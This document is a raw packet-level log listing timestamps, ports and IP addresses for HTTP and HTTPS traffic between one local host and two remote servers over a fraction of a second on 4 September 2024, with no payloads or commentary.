Sep 4, 2024 17:37:10.240017891 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.240036964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.240045071 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.240048885 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.240068913 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.240094900 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.240271091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.240287066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.240298033 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.240308046 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.240313053 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.240319967 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.240320921 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.240333080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.240345001 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.240366936 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.240509033 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.240520954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.240530968 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.240540028 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.240550041 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.240556002 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.240561962 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.240576029 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.240588903 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.240614891 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.241688013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.241715908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.241728067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.241729021 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.241741896 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.241756916 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.241839886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.241852045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.241863012 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.241873980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.241882086 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.241911888 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.246424913 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.246449947 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.246460915 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.246470928 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.246489048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.246507883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.246519089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.246527910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.246540070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.246546030 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.246561050 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.246588945 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.246736050 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.246748924 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.246758938 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.246769905 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.246781111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.246782064 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.246793985 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.246804953 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.246814966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.246819019 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.246819019 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.246828079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.246838093 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.246867895 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.246992111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247003078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247013092 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247025013 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247035980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247045040 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.247045040 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.247047901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247073889 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.247095108 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.247123957 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247133970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247143030 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247172117 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.247179985 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.247198105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247210026 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247226954 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247235060 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.247239113 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247250080 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247252941 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.247262001 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247267962 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.247292995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.247477055 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247489929 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247498989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247509003 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247519970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247525930 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.247529984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247534037 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.247541904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247551918 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247562885 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.247562885 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247576952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247585058 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.247587919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.247601032 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.247623920 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.249680996 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.249696016 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.249746084 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.249754906 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.249790907 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.250149965 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.250164986 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.250200987 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.250207901 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.250231981 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.250251055 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.250355959 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.250370026 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.250397921 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.250403881 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.250423908 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.250442028 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.250792027 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.250812054 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.250859976 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.250873089 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.250905991 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.251209021 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.251223087 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.251264095 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.251270056 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.251291990 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.251307011 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.252557039 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.252582073 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.252610922 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.252618074 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.252645969 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.252655983 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.252799034 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.252815008 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.252857924 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.252865076 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.252902031 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.253385067 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.253400087 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.253446102 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.253453970 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.253492117 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.277683020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.277693987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.277700901 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.277753115 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.277784109 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.277825117 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.277836084 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.277853012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.277859926 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.277867079 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.277873993 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.277878046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.277888060 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.277889013 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.277899027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.277901888 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.277911901 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.277920008 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.277939081 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.277954102 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278000116 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278008938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278027058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278032064 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278038025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278043032 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278048992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278059006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278060913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278072119 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278075933 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278083086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278083086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278095961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278096914 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278110981 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278126001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278306961 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278317928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278326035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278336048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278346062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278348923 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278356075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278363943 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278367996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278378963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278386116 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278402090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278420925 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278577089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278614998 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278667927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278681040 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278714895 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278714895 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278732061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278743029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278752089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278764963 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278765917 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278774023 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278791904 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278800011 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278871059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278882027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278889894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278899908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278909922 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278915882 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278919935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278930902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278934956 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278942108 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278953075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278956890 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278964043 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.278964043 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.278989077 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279006004 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279100895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279148102 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279170990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279180050 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279187918 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279196978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279216051 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279217005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279226065 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279232025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279243946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279253006 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279253960 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279272079 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279290915 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279464006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279474974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279484034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279494047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279504061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279505968 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279515982 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279520035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279530048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279537916 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279541016 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279550076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279551029 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279561043 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279572010 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279573917 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279589891 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279611111 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279721022 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279732943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279742002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279752016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279756069 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279762983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279771090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279774904 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279786110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279786110 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279786110 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279798985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279813051 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279855967 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279865980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279875040 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279886961 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279912949 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.279985905 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.279998064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280008078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280019045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280024052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280029058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280029058 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280046940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280050039 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280060053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280069113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280072927 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280078888 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280082941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280088902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280093908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280101061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280105114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280116081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280127048 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280134916 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280152082 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280158997 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280424118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280436993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280504942 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280571938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280586004 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280595064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280605078 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280613899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280622005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280626059 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280636072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280636072 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280646086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280656099 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280679941 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280679941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280699015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280709028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280711889 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280719042 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280728102 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280730009 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280740023 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280741930 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280752897 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280752897 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280761957 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.280765057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.280775070 CEST	80	49719	147.45.44.104	192.168.2.6
